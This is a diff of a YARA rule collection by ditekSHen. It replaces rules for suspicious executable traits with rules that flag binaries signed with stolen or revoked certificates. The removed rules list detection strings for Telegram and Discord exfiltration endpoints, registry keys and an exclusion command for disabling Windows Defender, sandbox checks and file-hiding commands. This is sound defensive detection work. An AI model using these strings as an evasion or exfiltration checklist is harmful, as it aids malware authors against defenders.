 		author = "ditekSHen"
-		id = "b5840af5-a285-53f4-bac7-07821e740089"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "2e831cd7-6992-5b5f-ad84-52590f3cc65a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1227-L1236"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5843-L5856"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8140c29eb54d8c8786b268d5241fcd221a5fb95433bc1038a7f23295afe8c9b8"
-		score = 40
-		quality = 45
+		logic_hash = "b6dd9cb0d2383bce3ab13b6a660b3f5ba554a2bf1fce4aabb6dd36187cc57f45"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "e2bf86dc46fca1c35f98ff84d8976be8aa0668bc"
+		hash1 = "dd49651e325b04ea14733bcd676c0a1cb58ab36bf79162868ade02b396ec3ab0"
+		hash2 = "823cb4b92a1266c880d917c7d6f71da37d524166287b30c0c89b6bb03c2e4b64"
 		importance = 20
 
-	strings:
-		$s1 = "<configSections>" ascii nocase
-		$s2 = "<value>77 90" ascii nocase
-
 	condition:
-		uint32( 0 ) == 0x6d783f3c and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_B64_Encoded_Useragent : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Beb721Fcb3274C984479D6554Efe8F49 : FILE
 {
 	meta:
-		description = "Detects executables containing base64 encoded User Agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e6a6eba2-587f-5b6b-b23d-4e4aa5289d1d"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "311b4a7a-3185-5c61-961e-bd7d9bca28dd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1238-L1247"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5858-L5869"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee06d3d9f2f7a294ce0f117d5838fe86ae77f98da0ba30551b0b42811227b1bd"
-		score = 40
-		quality = 45
+		logic_hash = "fdb28b4f8cf79d067ee8dcfc3109ceae38f7952c6fb34e61f489924d97d67151"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "2d1fd0cce4aa7e7dc6dd114a301825a7b8e887cf"
 		importance = 20
 
-	strings:
-		$s1 = "TW96aWxsYS81LjAgK" ascii wide
-		$s2 = "TW96aWxsYS81LjAgKFdpbmRvd3M" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONFUSER" and pe.signatures [ i ] . serial == "be:b7:21:fc:b3:27:4c:98:44:79:d6:55:4e:fe:8f:49" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Winddefender_Antiemaulation : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C4188D6B70B4Bd3B977B19Abd04C1157 : FILE
 {
 	meta:
-		description = "Detects executables containing potential Windows Defender anti-emulation checks"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e7dca0e6-060b-5394-afc5-b3705a51d934"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "f5b2b4cf-39a5-59c6-860e-b738a2acfd89"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1249-L1258"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5871-L5882"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "76f8a532a59c2a7fcd45d9f9aed3ea2020889228c81410445728f42b6b9d891e"
-		score = 40
-		quality = 45
+		logic_hash = "6ed619e18d749c2524ad3c1ddc3268f9ddf77feb3a3f2c5954ae4e7124d63c75"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "90fefd18c677d6e5ac6db969a7247e3eb0b018df"
 		importance = 20
 
-	strings:
-		$s1 = "JohnDoe" fullword ascii wide
-		$s2 = "HAL9TH" fullword ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRESTO Co., s.r.o." and pe.signatures [ i ] . serial == "00:c4:18:8d:6b:70:b4:bd:3b:97:7b:19:ab:d0:4c:11:57" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Attrib : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ad255D4Ebefa751F3782587396C08629 : FILE
 {
 	meta:
-		description = "Detects executables using attrib with suspicious attributes attributes"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "69925f45-b8a9-516c-857c-7a687b32e0c6"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "58e77872-5bd0-53b1-9595-c961c45e138c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1260-L1268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5884-L5895"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2d26581037a34f32b3e3aa6df5570f0de0b9e070cbe6190318a99c6f147250d8"
-		score = 40
-		quality = 45
+		logic_hash = "cc51de3852257b12a780f80755c7ca21f5d82542649c65072fd9427271da12ef"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "8fa4298057066c9ef96c28b2dd065e8896327658"
 		importance = 20
 
-	strings:
-		$s1 = "attrib +h +r +s" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Clearmytracksbyprocess : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_084B6F19898214A02A5F32E6Ea69F0Fd : FILE
 {
 	meta:
-		description = "Detects executables calling ClearMyTracksByProcess"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d548cf61-ffb7-5a21-9b76-246f8ffb6ad4"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "37149424-6ce7-56db-98c5-3895bf3f5c9b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1270-L1278"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5897-L5908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "970bdf2cfebc5196204087de134b9d2f032d8074cacbb3b9cc2c859aab3a95fc"
-		score = 40
-		quality = 43
+		logic_hash = "844339ec8aaf93e279b294830a842f007d97adc4be4f6910d143ee16e5710ed5"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "4b89f40ba2c83c3e65d2be59abb3385cde401581"
 		importance = 20
 
-	strings:
-		$s1 = "InetCpl.cpl,ClearMyTracksByProcess" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TORG-ALYANS, LLC" and pe.signatures [ i ] . serial == "08:4b:6f:19:89:82:14:a0:2a:5f:32:e6:ea:69:f0:fd" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Dotnetprochook : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_24C1Ef800F275Ab2780280C595De3464 : FILE
 {
 	meta:
-		description = "Detects executables with potential process hoocking"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1c32c7ee-0ac6-50ae-892e-73f46902115d"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "0bd14ac3-9761-5ac4-8cdc-6212a92c5b5d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1280-L1291"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5910-L5921"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e01147886444f8080b7cf7b423dc70b4b08fae6b88a8875eb075530fdb9f7909"
-		score = 40
-		quality = 45
+		logic_hash = "773fdb6d15a5bd1282dd9a48601b453b62de2e9832822858ad750c6462d6e116"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "836b81154eb924fe741f50a21db258da9b264b85"
 		importance = 20
 
-	strings:
-		$s1 = "UnHook" fullword ascii
-		$s2 = "SetHook" fullword ascii
-		$s3 = "CallNextHook" fullword ascii
-		$s4 = "_hook" fullword ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Telegramchatbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6401831B46588B9D872B02076C3A7B00 : FILE
 {
 	meta:
-		description = "Detects executables using Telegram Chat Bot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bcee52fe-495a-5ea1-bcd9-78b57c992752"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "d651bbe4-7e50-51bc-8f96-a78b11846699"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5923-L5934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "40374d9dda3d1896906f342725425860e83fbe6b5b0ac656a7035094e36340c0"
-		score = 40
-		quality = 45
+		logic_hash = "9a90c9d51dd6eb37bb3b6b17c5e3e5ebb6b6922efa14e3d8d60e72bcdb7b7259"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "19fc95ac815865e8b57c80ed21a22e2c0fecc1ff"
 		importance = 20
 
-	strings:
-		$s1 = "https://api.telegram.org/bot" ascii wide
-		$s2 = "/sendMessage?chat_id=" fullword ascii wide
-		$s3 = "Content-Disposition: form-data; name=\"" fullword ascii
-		$s4 = "/sendDocument?chat_id=" fullword ascii wide
-		$p1 = "/sendMessage" ascii wide
-		$p2 = "/sendDocument" ascii wide
-		$p3 = "&chat_id=" ascii wide
-		$p4 = "/sendLocation" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( 2 of ( $p* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_B64_Artifacts : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : FILE
 {
 	meta:
-		description = "Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc."
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b76ba291-6af5-5800-a280-c04c84cc3f29"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "f3cb7bd9-9e28-5478-b65d-60915157dd3b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1310-L1321"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5936-L5947"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "35a7a9c0722d8bd174b272c659e62db3e9f41483dc3a9bf5f339b9066ed06c57"
-		score = 40
-		quality = 45
+		logic_hash = "2902b075f40f1413eee937c045e082a3141ec309f9d8e1dfd3a384050ea0776c"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "e33dc0787099d92a712894cfef2aaba3f0d65359"
 		importance = 20
 
-	strings:
-		$s1 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA" ascii wide
-		$s2 = "L2Mgc2NodGFza3MgL2" ascii wide
-		$s3 = "QW1zaVNjYW5CdWZmZXI" ascii wide
-		$s4 = "VmlydHVhbFByb3RlY3Q" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Discordurl : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7Ed801843Fa001B8Add52D3A97B25931 : FILE
 {
 	meta:
-		description = "Detects executables Discord URL observed in first stage droppers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d7221bb4-48c5-5d80-ace1-95cf25fb585d"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "8dc9fbde-57bb-56ca-b925-902059612606"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1323-L1338"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5949-L5960"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7f600215268147f8e18f2b4eb6b2e9ba6dd44ab5603a140d3e1b2bb16ebb29c4"
-		score = 40
-		quality = 37
+		logic_hash = "2607dde1318b9b84056fc73664e4c1f82f20c23f311216e2201c3fdee0d1b6db"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "4ee1539c1455f0070d8d04820fb814f8794f84df"
 		importance = 20
 
-	strings:
-		$s1 = "https://discord.com/api/webhooks/" ascii wide nocase
-		$s2 = "https://cdn.discordapp.com/attachments/" ascii wide nocase
-		$s3 = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va" ascii wide
-		$s4 = "aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobW" ascii wide
-		$s5 = "/skoohbew/ipa/moc.drocsid//:sptth" ascii wide nocase
-		$s6 = "/stnemhcatta/moc.ppadrocsid.ndc//:sptth" ascii wide nocase
-		$s7 = "av9GaiV2dvkGch9SbvNmLkJ3bjNXak9yL6MHc0RHa" ascii wide
-		$s8 = "WboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Regkeycomb_Disablewindefender : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0F0Ed5318848703405D40F7C62D0F39A : FILE
 {
 	meta:
-		description = "Detects executables embedding registry key / value combination indicative of disabling Windows Defender features"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "74c82d78-bdb3-54af-b04a-20d66ff123d7"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "6baebaa7-275c-571d-b321-9a21d7799a33"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1448-L1470"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5962-L5973"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a33052ded0823a8528590bd0da0023024db174f6f6a0766284c3195f5d3d41f"
-		score = 40
-		quality = 33
+		logic_hash = "77bd8fd2dc48e2fc8abbf0f3411dfa8010326b6a9928fb392cce6e0fe8e9d309"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "ed91194ee135b24d5df160965d8036587d6c8c35"
 		importance = 20
 
-	strings:
-		$r1 = "SOFTWARE\\Policies\\Microsoft\\Windows Defender" ascii wide nocase
-		$k1 = "DisableAntiSpyware" ascii wide
-		$r2 = "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" ascii wide nocase
-		$k2 = "DisableBehaviorMonitoring" ascii wide
-		$k3 = "DisableOnAccessProtection" ascii wide
-		$k4 = "DisableScanOnRealtimeEnable" ascii wide
-		$r3 = "SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection" ascii wide nocase
-		$k5 = "vDisableRealtimeMonitoring" ascii wide
-		$r4 = "SOFTWARE\\Microsoft\\Windows Defender\\Spynet" ascii wide nocase
-		$k6 = "SpyNetReporting" ascii wide
-		$k7 = "SubmitSamplesConsent" ascii wide
-		$r5 = "SOFTWARE\\Microsoft\\Windows Defender\\Features" ascii wide nocase
-		$k8 = "TamperProtection" ascii wide
-		$r6 = "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" ascii wide nocase
-		$k9 = "Add-MpPreference -ExclusionPath \"{0}\"" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $r* ) and 1 of ( $k* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Regkeycomb_Iexecutecommandcom : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_537Aa4F1Bae48F052C3E57C3E2E1Ee61 : FILE
 {
 	meta:
-		description = "Detects executables embedding command execution via IExecuteCommand COM object"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4bc7e6aa-1771-5c33-bc62-71072dec04cb"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "33316c5e-b14f-50b5-8971-3a8b5a3c2497"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1472-L1486"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5975-L5986"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "269109f96f3fca5eacc19664b7b0c7f970131db29c47bfe1e9e67e56604bf1c1"
-		score = 40
-		quality = 43
+		logic_hash = "83d205998f43a2404146064e13726c149bc56fed6b886ee1812378c027f03da0"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "15355505a242c44d6c36abab6267cc99219a931c"
 		importance = 20
 
-	strings:
-		$r1 = "Classes\\Folder\\shell\\open\\command" ascii wide nocase
-		$k1 = "DelegateExecute" ascii wide
-		$s1 = "/EXEFilename \"{0}" ascii wide
-		$s2 = "/WindowState \"\"" ascii wide
-		$s3 = "/PriorityClass \"\"32\"\" /CommandLine \"" ascii wide
-		$s4 = "/StartDirectory \"" ascii wide
-		$s5 = "/RunAs" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $r* ) and 1 of ( $k* ) ) or ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALPHA AME LIMITED LLP" and pe.signatures [ i ] . serial == "53:7a:a4:f1:ba:e4:8f:05:2c:3e:57:c3:e2:e1:ee:61" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_WMI_Enumeratevideodevice : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_61B11Ef9726Ab2E78132E01Bd791B336 : FILE
 {
 	meta:
-		description = "Detects executables attemping to enumerate video devices using WMI"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6d4ede5e-4ec5-5753-bd50-8e129ac532a4"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "5b830ab1-16d2-573c-81b7-b8b922af6f4b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1488-L1502"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5988-L5999"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ef63d7a569ee1530a23d151ee394969f4b3b6bac28ed571f48e3f97b87d020a"
-		score = 40
-		quality = 41
+		logic_hash = "50c89d732409ff680734f481d858256001245c10345d9e6f1cbb51dcdc9c2cc9"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "9f7fcfd7e70dd7cd723ac20e5e7cb7aad1ba976b"
 		importance = 20
 
-	strings:
-		$q1 = "Select * from Win32_CacheMemory" ascii wide nocase
-		$d1 = "{860BB310-5D01-11d0-BD3B-00A0C911CE86}" ascii wide
-		$d2 = "{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}" ascii wide
-		$d3 = "{55272A00-42CB-11CE-8135-00AA004BB851}" ascii wide
-		$d4 = "SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\000" ascii wide nocase
-		$d5 = "HardwareInformation.AdapterString" ascii wide
-		$d6 = "HardwareInformation.qwMemorySize" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $q* ) and 1 of ( $d* ) ) or 3 of ( $d* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Dcratby : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E339C8069126Aa6313484Fea85B4B326F7B8860C : FILE
 {
 	meta:
-		description = "Detects executables containing the string DcRatBy"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d8408cc0-0245-59b7-9134-1f4edd811df7"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "a8a6a285-98e1-5a2a-ab89-c67809fea3b2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1504-L1512"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6001-L6012"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1a0f863fb71c84a9a01c3f07da0fdff9ea06b061f85532ac523d6a5d1e0e1e11"
-		score = 40
-		quality = 45
+		logic_hash = "6f373c5a8f99893088fa1afffeccdf24ae6ed118d7bea9df43281073bd8e85bb"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "e339c8069126aa6313484fea85b4b326f7b8860c"
 		importance = 20
 
-	strings:
-		$s1 = "DcRatBy" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Germany classer software" and pe.signatures [ i ] . serial == "01" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Anti_Winjail : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_734D0Baf7A6B44743Ff852C8Ba7A751A7Ff0Ec73 : FILE
 {
 	meta:
-		description = "Detects executables potentially checking for WinJail sandbox window"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f3a3d099-7659-50aa-8dca-3a2b1c18c3b5"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "1dc06f6e-2152-516a-b9cc-0d95c098c88f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1514-L1522"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6031-L6042"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ae8080dad4481b6a2e295c29d3ed24e86da83575e1a5aeda8b1317e6caa74707"
-		score = 40
-		quality = 45
+		logic_hash = "54620c58bae2c2f9859916a58b0fef4310dd27fdada663c28bb7d58bdaefc7c5"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "734d0baf7a6b44743ff852c8ba7a751a7ff0ec73"
 		importance = 20
 
-	strings:
-		$s1 = "Afx:400000:0" fullword ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Transition software (C) 2018" and pe.signatures [ i ] . serial == "01" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Anti_Oldcopypaste : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02Fa994D660De659Ee9037Ecb437D766 : FILE
 {
 	meta:
